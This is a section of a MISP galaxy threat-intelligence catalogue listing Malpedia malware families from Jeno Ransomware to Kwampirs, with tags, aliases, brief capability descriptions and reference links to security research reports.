Jeno Ransomware is also known as:

- Jest
- Valeria

*Table 1934. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.jeno">https://malpedia.caad.fkie.fraunhofer.de/details/win.jeno</a></td>
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<td><a href="https://id-ransomware.blogspot.com/2020/04/jeno-ransomware.html">https://id-ransomware.blogspot.com/2020/04/jeno-ransomware.html</a></td>
</tr>
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</table>

**JhoneRAT**

Cisco Talos identified JhoneRAT in January 2020. The RAT is delivered through cloud services (Google Drive) and also submits stolen data to them (Google Drive, Twitter, ImgBB, GoogleForms). The actors using JhoneRAT target Saudi Arabia, Iraq, Egypt, Libya, Algeria, Morocco, Tunisia, Oman, Yemen, Syria, UAE, Kuwait, Bahrain and Lebanon.

The tag is: misp-galaxy:malpedia="JhoneRAT"

JhoneRAT is also known as:

*Table 1935. Table References*
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https://malpedia.caad.fkie.fraunhofer.de/details/win.jhone_rat
https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/
https://blog.talosintelligence.com/2020/01/jhonerat.html

Jigsaw

The tag is: `misp-galaxy:malpedia="Jigsaw"`

Jigsaw is also known as:

*Table 1936. Table References*

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.jigsaw

Jimmy

The tag is: `misp-galaxy:malpedia="Jimmy"`

Jimmy is also known as:

*Table 1937. Table References*

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.jimmy

Joanap

The tag is: `misp-galaxy:malpedia="Joanap"`

Joanap is also known as:

*Table 1938. Table References*

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.joanap
https://www.us-cert.gov/ncas/alerts/TA18-149A
https://www.secureworks.com/research/threat-profiles/nickel-academy
Joao

The tag is: `misp-galaxy:malpedia="Joao"`

Joao is also known as:

Table 1939. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.joao">https://malpedia.caad.fkie.fraunhofer.de/details/win.joao</a></td>
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Jolob

The tag is: `misp-galaxy:malpedia="Jolob"`

Jolob is also known as:

Table 1940. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.jolob">https://malpedia.caad.fkie.fraunhofer.de/details/win.jolob</a></td>
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JQJSNICKER

The tag is: `misp-galaxy:malpedia="JQJSNICKER"`

JQJSNICKER is also known as:

Table 1941. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.jqjsnicker">https://malpedia.caad.fkie.fraunhofer.de/details/win.jqjsnicker</a></td>
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<tr>
<td><a href="http://marcmaiffret.com/vault7/">http://marcmaiffret.com/vault7/</a></td>
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**JripBot**

The tag is: `misp-galaxy:malpedia="JripBot"`

JripBot is also known as:

*Table 1942. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.jripbot">https://malpedia.caad.fkie.fraunhofer.de/details/win.jripbot</a></td>
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</tbody>
</table>

**JSOutProx**

JSOutProx is a sophisticated attack framework built using both Javascript and .NET. It uses the .NET (de)serialization feature to interact with a Javascript file which is the core module running on a victim machine. Once the malware is run on the victim, the framework can load several plugins performing additional malicious activities on the target.

The tag is: `misp-galaxy:malpedia="JSOutProx"`

JSOutProx is also known as:

*Table 1943. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.jsoutprox">https://malpedia.caad.fkie.fraunhofer.de/details/win.jsoutprox</a></td>
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<tr>
<td><a href="https://blog.yoroi.company/research/unveiling-jsoutprox-a-new-enterprise-grade-implant/">https://blog.yoroi.company/research/unveiling-jsoutprox-a-new-enterprise-grade-implant/</a></td>
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<td><a href="https://twitter.com/zlab_team/status/1208022180241530882">https://twitter.com/zlab_team/status/1208022180241530882</a></td>
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<td><a href="https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf">https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf</a></td>
</tr>
<tr>
<td><a href="https://www.fortinet.com/blog/threat-research/adversary-playbook-javascript-rat-looking-for-that-government-cheese">https://www.fortinet.com/blog/threat-research/adversary-playbook-javascript-rat-looking-for-that-government-cheese</a></td>
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</tbody>
</table>

**JSSLoader**

The tag is: `misp-galaxy:malpedia="JSSLoader"`

JSSLoader is also known as:

*Table 1944. Table References*
JuicyPotato

As described on the Github repository page, "A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM".

The tag is: `misp-galaxy:malpedia="JuicyPotato"`

JuicyPotato is also known as:

Table 1945. Table References

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<th>Links</th>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.juicy_potato">https://malpedia.caad.fkie.fraunhofer.de/details/win.juicy_potato</a></td>
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<tr>
<td><a href="https://github.com/ohpe/juicy-potato">https://github.com/ohpe/juicy-potato</a></td>
</tr>
</tbody>
</table>

JUMPALL

According to FireEye, JUMPALL is a malware dropper that has been observed dropping HIGHNOON/ZXSHELL/SOGU.

The tag is: `misp-galaxy:malpedia="JUMPALL"`

JUMPALL is also known as:

Table 1946. Table References

<table>
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<th>Links</th>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.jumpall">https://malpedia.caad.fkie.fraunhofer.de/details/win.jumpall</a></td>
</tr>
<tr>
<td><a href="https://content.fireeye.com/apt-41/rpt-apt41/">https://content.fireeye.com/apt-41/rpt-apt41/</a></td>
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</table>

Jupyter Stealer

The tag is: `misp-galaxy:malpedia="Jupyter Stealer"`

Jupyter Stealer is also known as:

Table 1947. Table References

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KAgent

The tag is: misp-galaxy:malpedia=“KAgent”

KAgent is also known as:

Table 1948. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.kagent

Karagany

The tag is: misp-galaxy:malpedia=“Karagany”

Karagany is also known as:

• Karagny

Table 1949. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.karagany
https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector
https://www.secureworks.com/research/threat-profiles/iron-liberty

Kardon Loader

According to ASERT, Kardon Loader is a fully featured downloader, enabling the download and installation of other malware, eg. banking trojans/credential theft etc. This malware has been on sale by an actor under the username Yattaze, starting in late April. The actor offers the sale of the
malware as a standalone build with charges for each additional rebuild, or the ability to set up a botshop in which case any customer can establish their own operation and further sell access to a new customer base.

The tag is: `misp-galaxy:malpedia="Kardon Loader"`

Kardon Loader is also known as:

<table>
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<th>Table 1950. Table References</th>
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<tr>
<td>Links</td>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.kardonloader">https://malpedia.caad.fkie.fraunhofer.de/details/win.kardonloader</a></td>
</tr>
<tr>
<td><a href="https://asert.arbornetworks.com/kardon-loader-looks-for-beta-testers/">https://asert.arbornetworks.com/kardon-loader-looks-for-beta-testers/</a></td>
</tr>
</tbody>
</table>

**Karius**

According to checkpoint, Karius is a banking trojan in development, borrowing code from Ramnit, Vawtrack as well as Trickbot, currently implementing webinject attacks only.

It comes with an injector that loads an intermediate "proxy" component, which in turn loads the actual banker component.

Communication with the c2 are in json format and encrypted with RC4 with a hardcoded key.

In the initial version, observed in March 2018, the webinjects were hardcoded in the binary, while in subsequent versions, they were received by the c2.

The tag is: `misp-galaxy:malpedia="Karius"`

Karius is also known as:

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<th>Table 1951. Table References</th>
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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.karius">https://malpedia.caad.fkie.fraunhofer.de/details/win.karius</a></td>
</tr>
<tr>
<td><a href="https://research.checkpoint.com/banking-trojans-development/">https://research.checkpoint.com/banking-trojans-development/</a></td>
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</table>

**Karkoff**

The tag is: `misp-galaxy:malpedia="Karkoff"`

Karkoff is also known as:

- CACTUSPIPE
- MailDropper
**KasperAgent**

The tag is: `misp-galaxy:malpedia="KasperAgent"`

KasperAgent is also known as:

**Kazuar**

The tag is: `misp-galaxy:malpedia="Kazuar"`

Kazuar is also known as:
**Kegotip**

The tag is: `misp-galaxy:malpedia="Kegotip"`

Kegotip is also known as:

*Table 1955. Table References*

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.kegotip">https://malpedia.caad.fkie.fraunhofer.de/details/win.kegotip</a></td>
</tr>
<tr>
<td><a href="https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/">https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/</a></td>
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**KEKW Ransomware**

The tag is: `misp-galaxy:malpedia="KEKW Ransomware"`

KEKW Ransomware is also known as:

- KEKW-Locker

*Table 1956. Table References*

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.kekw">https://malpedia.caad.fkie.fraunhofer.de/details/win.kekw</a></td>
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<tr>
<td><a href="https://id-ransomware.blogspot.com/2020/03/kekw-ransomware.html">https://id-ransomware.blogspot.com/2020/03/kekw-ransomware.html</a></td>
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**Kelihos**

The tag is: `misp-galaxy:malpedia="Kelihos"`

Kelihos is also known as:

*Table 1957. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.kelihos">https://malpedia.caad.fkie.fraunhofer.de/details/win.kelihos</a></td>
</tr>
<tr>
<td><a href="https://www.wired.com/2017/04/fbi-took-russias-spam-king-massive-botnet/">https://www.wired.com/2017/04/fbi-took-russias-spam-king-massive-botnet/</a></td>
</tr>
<tr>
<td><a href="https://en.wikipedia.org/wiki/Kelihos_botnet">https://en.wikipedia.org/wiki/Kelihos_botnet</a></td>
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KerrDown

The tag is: `misp-galaxy:malpedia="KerrDown"`

KerrDown is also known as:

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<th>Table 1958. Table References</th>
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<tr>
<td><strong>Links</strong></td>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.kerrdown">https://malpedia.caad.fkie.fraunhofer.de/details/win.kerrdown</a></td>
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<tr>
<td><a href="https://norfolkinfosec.com/jeshell-an-oceanlotus-apt32-backdoor/">https://norfolkinfosec.com/jeshell-an-oceanlotus-apt32-backdoor/</a></td>
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<tr>
<td><a href="https://tradahacking.vn/th%C6%B0%E1%BB%9Fng-t%E1%BA%BFlt-fbcbbed49da7">https://tradahacking.vn/th%C6%B0%E1%BB%9Fng-t%E1%BA%BFlt-fbcbbed49da7</a></td>
</tr>
<tr>
<td><a href="https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf">https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf</a></td>
</tr>
<tr>
<td><a href="https://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/">https://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/</a></td>
</tr>
<tr>
<td><a href="https://blog.cystack.net/word-based-malware-attack/">https://blog.cystack.net/word-based-malware-attack/</a></td>
</tr>
<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/tin-woodlawn">https://www.secureworks.com/research/threat-profiles/tin-woodlawn</a></td>
</tr>
<tr>
<td><a href="https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam">https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam</a></td>
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Ketrican

Ketrican is a backdoor trojan used by APT 15.

The tag is: `misp-galaxy:malpedia="Ketrican"`

Ketrican is also known as:

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<tr>
<th>Table 1959. Table References</th>
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<tr>
<td><strong>Links</strong></td>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.ketrican">https://malpedia.caad.fkie.fraunhofer.de/details/win.ketrican</a></td>
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<td><a href="https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/">https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/</a></td>
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<tr>
<td><a href="https://www.welivesecurity.com/2019/07/18/okrum-ke3chang-targets-diplomatic-missions/">https://www.welivesecurity.com/2019/07/18/okrum-ke3chang-targets-diplomatic-missions/</a></td>
</tr>
<tr>
<td><a href="https://www.intezer.com/blog/research/the-evolution-of-apt15s-codebase-2020/">https://www.intezer.com/blog/research/the-evolution-of-apt15s-codebase-2020/</a></td>
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</table>
Ketrum

Intezer found this family mid May 2020, which appears to be a merger of the family Ketrican and Okrum.

The tag is: `misp-galaxy:malpedia="Ketrum"

Ketrum is also known as:

Table 1960. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.ketrum">https://malpedia.caad.fkie.fraunhofer.de/details/win.ketrum</a></td>
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<td><a href="https://www.intezer.com/blog/research/the-evolution-of-apt15s-codebase-2020/">https://www.intezer.com/blog/research/the-evolution-of-apt15s-codebase-2020/</a></td>
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</tbody>
</table>

KeyBase

KeyBase is a .NET credential stealer and keylogger that first emerged in February 2015. It often incorporates Nirsoft tools such as MailPassView and WebBrowserPassView for additional credential grabbing.

The tag is: `misp-galaxy:malpedia="KeyBase"

KeyBase is also known as:

• Kibex

Table 1961. Table References

<table>
<thead>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.keybase">https://malpedia.caad.fkie.fraunhofer.de/details/win.keybase</a></td>
</tr>
<tr>
<td><a href="https://unit42.paloaltonetworks.com/keybase-keylogger-malware-family-exposed/">https://unit42.paloaltonetworks.com/keybase-keylogger-malware-family-exposed/</a></td>
</tr>
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<td><a href="https://th3l4b.blogspot.com/2015/10/keybase-loggerclipboardcredsstealer.html">https://th3l4b.blogspot.com/2015/10/keybase-loggerclipboardcredsstealer.html</a></td>
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<tr>
<td><a href="https://unit42.paloaltonetworks.com/keybase-threat-grows-despite-public-takedown-a-picture-is-worth-a-thousand-words/">https://unit42.paloaltonetworks.com/keybase-threat-grows-despite-public-takedown-a-picture-is-worth-a-thousand-words/</a></td>
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<td><a href="https://voidsec.com/keybase-en/">https://voidsec.com/keybase-en/</a></td>
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<td><a href="https://isc.sans.edu/forums/diary/Malicious+Office+files+using+fileless+UAC+bypass+to+drop+KEYBASE+malware/22011/">https://isc.sans.edu/forums/diary/Malicious+Office+files+using+fileless+UAC+bypass+to+drop+KEYBASE+malware/22011/</a></td>
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KeyBoy

The tag is: `misp-galaxy:malpedia="KeyBoy"
KeyBoy is also known as:

- TSSL

### Table 1962. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.keyboy">https://malpedia.caad.fkie.fraunhofer.de/details/win.keyboy</a></td>
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<td><a href="https://citizenlab.ca/2016/11/parliament-keyboy/">https://citizenlab.ca/2016/11/parliament-keyboy/</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-hobart">https://www.secureworks.com/research/threat-profiles/bronze-hobart</a></td>
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<tr>
<td><a href="https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/">https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/</a></td>
</tr>
<tr>
<td><a href="https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/the-keyboys-are-back-in-town.html">https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/the-keyboys-are-back-in-town.html</a></td>
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**APT3 Keylogger**

The tag is: `misp-galaxy:malpedia="APT3 Keylogger"`

APT3 Keylogger is also known as:

### Table 1963. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.keylogger_apt3">https://malpedia.caad.fkie.fraunhofer.de/details/win.keylogger_apt3</a></td>
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<td><a href="https://intrusiontruth.wordpress.com/2017/05/09/apt3-is-boyusec-a-chinese-intelligence-contractor/">https://intrusiontruth.wordpress.com/2017/05/09/apt3-is-boyusec-a-chinese-intelligence-contractor/</a></td>
</tr>
<tr>
<td><a href="https://twitter.com/smoothimpact/status/773631684038107136">https://twitter.com/smoothimpact/status/773631684038107136</a></td>
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**KEYMARBLE**

The tag is: `misp-galaxy:malpedia="KEYMARBLE"`

KEYMARBLE is also known as:

### Table 1964. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.keymarble">https://malpedia.caad.fkie.fraunhofer.de/details/win.keymarble</a></td>
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<tr>
<td><a href="https://www.us-cert.gov/ncas/analysis-reports/AR18-221A">https://www.us-cert.gov/ncas/analysis-reports/AR18-221A</a></td>
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<tr>
<td><a href="https://research.checkpoint.com/north-korea-turns-against-russian-targets/">https://research.checkpoint.com/north-korea-turns-against-russian-targets/</a></td>
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**KGH_SPY**

The tag is: `misp-galaxy:malpedia="KGH_SPY"`

KGH_SPY is also known as:

*Table 1965. Table References*

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**KHRAT**

The tag is: `misp-galaxy:malpedia="KHRAT"`

KHRAT is also known as:

*Table 1966. Table References*

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**Kikothac**

The tag is: `misp-galaxy:malpedia="Kikothac"`

Kikothac is also known as:

*Table 1967. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.kikothac">https://malpedia.caad.fkie.fraunhofer.de/details/win.kikothac</a></td>
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<tr>
<td><a href="https://www.group-ib.com/resources/threat-research/silence.html">https://www.group-ib.com/resources/threat-research/silence.html</a></td>
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**KillDisk**

The tag is: `misp-galaxy:malpedia="KillDisk"`

KillDisk is also known as:
Table 1968. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.killdisk">https://malpedia.caad.fkie.fraunhofer.de/details/win.killdisk</a></td>
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<td><a href="https://www.secureworks.com/research/threat-profiles/iron-viking">https://www.secureworks.com/research/threat-profiles/iron-viking</a></td>
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KimJongRat

The tag is: misp-galaxy:malpedia="KimJongRat"

KimJongRat is also known as:

Table 1969. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.kimjongrat">https://malpedia.caad.fkie.fraunhofer.de/details/win.kimjongrat</a></td>
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Kimsuky

The tag is: misp-galaxy:malpedia="Kimsuky"

Kimsuky is also known as:

Table 1970. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.kimsuky">https://malpedia.caad.fkie.fraunhofer.de/details/win.kimsuky</a></td>
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<tr>
<td><a href="https://metaswan.github.io/posts/Malware-Kimsuky-group's-resume-impersonation-malware">https://metaswan.github.io/posts/Malware-Kimsuky-group's-resume-impersonation-malware</a></td>
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<tr>
<td><a href="https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure">https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure</a></td>
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<tr>
<td><a href="https://blog.alyac.co.kr/2347">https://blog.alyac.co.kr/2347</a></td>
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KINS

The tag is: `misp-galaxy:malpedia="KINS"`

KINS is also known as:

- Kasper Internet Non-Security
- Maple

Table 1971. Table References

<table>
<thead>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.kins">https://malpedia.caad.fkie.fraunhofer.de/details/win.kins</a></td>
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<tr>
<td><a href="https://securityintelligence.com/zeus-maple-variant-targets-canadian-online-banking-customers/">https://securityintelligence.com/zeus-maple-variant-targets-canadian-online-banking-customers/</a></td>
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<tr>
<td><a href="https://github.com/nyx0/KINS">https://github.com/nyx0/KINS</a></td>
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KIVARS

The tag is: `misp-galaxy:malpedia="KIVARS"`

KIVARS is also known as:

Table 1972. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.kivars">https://malpedia.caad.fkie.fraunhofer.de/details/win.kivars</a></td>
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Klackring

Microsoft describes that threat actor ZINC is using Klackring as a malware dropped by ComeBacker, both being used to target security researchers.
Klackring is also known as:

Table 1973. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.klackring">https://malpedia.caad.fkie.fraunhofer.de/details/win.klackring</a></td>
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<tr>
<td><a href="https://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/">https://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/</a></td>
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KleptoParasite Stealer

KleptoParasite Stealer is advertised on Hackforums as a noob-friendly stealer. It is modular and comes with a IP retriever module, a Outlook stealer (32bit/64bit) and a Chrome/Firefox stealer (32bit/64bit). Earlier versions come bundled (loader plus modules), newer versions come with a loader (167k) that grabs the modules.

PDB-strings suggest a relationship to JogLog v6 and v7.

KleptoParasite Stealer is also known as:

• Joglog
• Parasite

Table 1974. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer">https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer</a></td>
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KLRD

The tag is: *misp-galaxy:malpedia="KLRD"

KLRD is also known as:

Table 1975. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.klrd">https://malpedia.caad.fkie.fraunhofer.de/details/win.klrd</a></td>
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Knot Ransomware

The tag is: *misp-galaxy:malpedia="Knot Ransomware"
Knot Ransomware is also known as:

Table 1976. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.knot">https://malpedia.caad.fkie.fraunhofer.de/details/win.knot</a></td>
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<tr>
<td><a href="https://twitter.com/malwrhunterteam/status/1345313324825780226">https://twitter.com/malwrhunterteam/status/1345313324825780226</a></td>
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Koadic

The tag is: `misp-galaxy:malpedia="Koadic"`

Koadic is also known as:

Table 1977. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.koadic">https://malpedia.caad.fkie.fraunhofer.de/details/win.koadic</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/cobalt-trinity">https://www.secureworks.com/research/threat-profiles/cobalt-trinity</a></td>
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<td><a href="http://www.secureworks.com/research/threat-profiles/cobalt-ulster">http://www.secureworks.com/research/threat-profiles/cobalt-ulster</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/gold-drake">https://www.secureworks.com/research/threat-profiles/gold-drake</a></td>
</tr>
<tr>
<td><a href="https://resources.malwarebytes.com/files/2021/02/LazyScripter.pdf">https://resources.malwarebytes.com/files/2021/02/LazyScripter.pdf</a></td>
</tr>
<tr>
<td><a href="https://github.com/zerosum0x0/koadic">https://github.com/zerosum0x0/koadic</a></td>
</tr>
<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/cobalt-ulster">https://www.secureworks.com/research/threat-profiles/cobalt-ulster</a></td>
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KokoKrypt

The tag is: `misp-galaxy:malpedia="KokoKrypt"`

KokoKrypt is also known as:

Table 1978. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.kokokrypt">https://malpedia.caad.fkie.fraunhofer.de/details/win.kokokrypt</a></td>
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<tr>
<td><a href="https://twitter.com/struppigel/status/812726545173401600">https://twitter.com/struppigel/status/812726545173401600</a></td>
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</tbody>
</table>
KOMPROGO

KOMPROGO is a signature backdoor used by APT32 that is capable of process, file, and registry management, creating a reverse shell, running WMI queries, retrieving information about the infected system.

The tag is: misp-galaxy:malpedia="KOMPROGO"

KOMPROGO is also known as:

- Splinter RAT

Table 1979. Table References

<table>
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<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.komprogo">https://malpedia.caad.fkie.fraunhofer.de/details/win.komprogo</a></td>
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<tr>
<td><a href="https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html">https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html</a></td>
</tr>
</tbody>
</table>

Konni

Konni is a remote administration tool, observed in the wild since early 2014. The Konni malware family is potentially linked to APT37, a North-Korean cyber espionage group active since 2012. The group primary victims are South-Korean political organizations, as well as Japan, Vietnam, Russia, Nepal, China, India, Romania, Kuwait, and other parts of the Middle East.

The tag is: misp-galaxy:malpedia="Konni"

Konni is also known as:

Table 1980. Table References

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<th>Links</th>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.konni">https://malpedia.caad.fkie.fraunhofer.de/details/win.konni</a></td>
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<tr>
<td><a href="http://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html">http://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html</a></td>
</tr>
<tr>
<td><a href="https://blog.alyac.co.kr/2474">https://blog.alyac.co.kr/2474</a></td>
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<tr>
<td><a href="https://us-cert.cisa.gov/ncas/alerts/aa20-227a">https://us-cert.cisa.gov/ncas/alerts/aa20-227a</a></td>
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<tr>
<td><a href="https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b">https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b</a></td>
</tr>
<tr>
<td><a href="https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/">https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/</a></td>
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KoobFace

The tag is: misp-galaxy:malpedia="KoobFace"

KoobFace is also known as:

Table 1981. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.koobface

Korlia

The tag is: misp-galaxy:malpedia="Korlia"

Korlia is also known as:

- Bional

Table 1982. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.korlia
https://unit42.paloaltonetworks.com/unit42-bisonal-malware-used-attacks-russia-south-korea/
https://securelist.com/cactuspete-apt-groups-updated-bisonal-backdoor/97962/
http://asec.ahnlab.com/tag/Operation%20Bitter%20Biscuit
https://blog.talosintelligence.com/2020/03/bisonal-10-years-of-play.html
https://asec.ahnlab.com/1298
https://www.secureworks.com/research/threat-profiles/bronze-huntley
Kovter

Kovter is a Police Ransomware


The tag is: misp-galaxy:malpedia="Kovter"

Kovter is also known as:

Table 1983. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.kovter">https://malpedia.caad.fkie.fraunhofer.de/details/win.kovter</a></td>
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<tr>
<td><a href="https://blog.malwarebytes.com/threat-analysis/2016/07/untangling-kovter/">https://blog.malwarebytes.com/threat-analysis/2016/07/untangling-kovter/</a></td>
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<td><a href="https://us-cert.cisa.gov/ncas/alerts/aa20-345a">https://us-cert.cisa.gov/ncas/alerts/aa20-345a</a></td>
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<tr>
<td><a href="https://0x00sec.org/t/analyzing-modern-malware-techniques-part-1/18663">https://0x00sec.org/t/analyzing-modern-malware-techniques-part-1/18663</a></td>
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</table>

KPOT Stealer

The tag is: misp-galaxy:malpedia="KPOT Stealer"

KPOT Stealer is also known as:

- Khalesi
- Kpot

Table 1984. Table References
### Kraken

The tag is: **misp-galaxy:malpedia=“Kraken”**

Kraken is also known as:

**Table 1985. Table References**

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.kraken">https://malpedia.caad.fkie.fraunhofer.de/details/win.kraken</a></td>
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<tr>
<td><a href="https://www.recordedfuture.com/kraken-cryptor-ransomware/">https://www.recordedfuture.com/kraken-cryptor-ransomware/</a></td>
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### KrBanker

The tag is: **misp-galaxy:malpedia=“KrBanker”**

KrBanker is also known as:

- BlackMoon

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798
KrDownloader

The tag is: misp-galaxy:malpedia="KrDownloader"

KrDownloader is also known as:

Table 1986. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.krdownloader

Kronos

The tag is: misp-galaxy:malpedia="Kronos"

Kronos is also known as:

• Osiris

Table 1988. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.kronos
https://www.zdnet.com/article/security-researcher-malwaretech-pleads-guilty/
https://www.securonix.com/securonix-threat-research-kronos-osiris-banking-trojan-attack
https://blog.morphisec.com/long-live-osiris-banking-trojan-targets-german-ip-addresses
https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/
KryptoCibule

The tag is: misp-galaxy:malpedia="KryptoCibule"

KryptoCibule is also known as:

Table 1989. Table References

Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.kryptocibule
https://www.welivesecurity.com/2020/09/02/kryptocibule-multitasking-multicurrency-cryptostealer/

KSL0T

A keylogger used by Turla.

The tag is: misp-galaxy:malpedia="KSL0T"

KSL0T is also known as:

Table 1990. Table References

Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ksl0t
https://0ffset.net/reverse-engineering/malware-analysis/analyzing-turlas-keylogger-1/
https://0ffset.net/reverse-engineering/malware-analysis/analyzing-turlas-keylogger-2/
https://0ffset.wordpress.com/2018/10/05/post-0x17-2-turla-keylogger/

Kuaibu

The tag is: misp-galaxy:malpedia="Kuaibu"

Kuaibu is also known as:

• Barys
- Gofot
- Kuaihy

Table 1991. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.kuaibu8">https://malpedia.caad.fkie.fraunhofer.de/details/win.kuaibu8</a></td>
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**Kuluoz**

The tag is: `misp-galaxy:malpedia="Kuluoz"`

Kuluoz is also known as:

Table 1992. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.kuluoz">https://malpedia.caad.fkie.fraunhofer.de/details/win.kuluoz</a></td>
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**Kurton**

The tag is: `misp-galaxy:malpedia="Kurton"`

Kurton is also known as:

Table 1993. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.kurton">https://malpedia.caad.fkie.fraunhofer.de/details/win.kurton</a></td>
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**Kutaki**

The tag is: `misp-galaxy:malpedia="Kutaki"`

Kutaki is also known as:

Table 1994. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.kutaki">https://malpedia.caad.fkie.fraunhofer.de/details/win.kutaki</a></td>
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</tbody>
</table>

**Kwampirs**

Kwampirs is a family of malware which uses SMB to spread. It typically will not execute or deploy
in environments in which there is no publicly available admin$ share. It is a fully featured backdoor which can download additional modules. Typical C2 traffic is over HTTP and includes "q=[ENCRYPTED DATA]" in the URI.

The tag is: **misp-galaxy:malpedia="Kwampirs"**

Kwampirs is also known as:

**Table 1995. Table References**

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.kwampirs">https://malpedia.caad.fkie.fraunhofer.de/details/win.kwampirs</a></td>
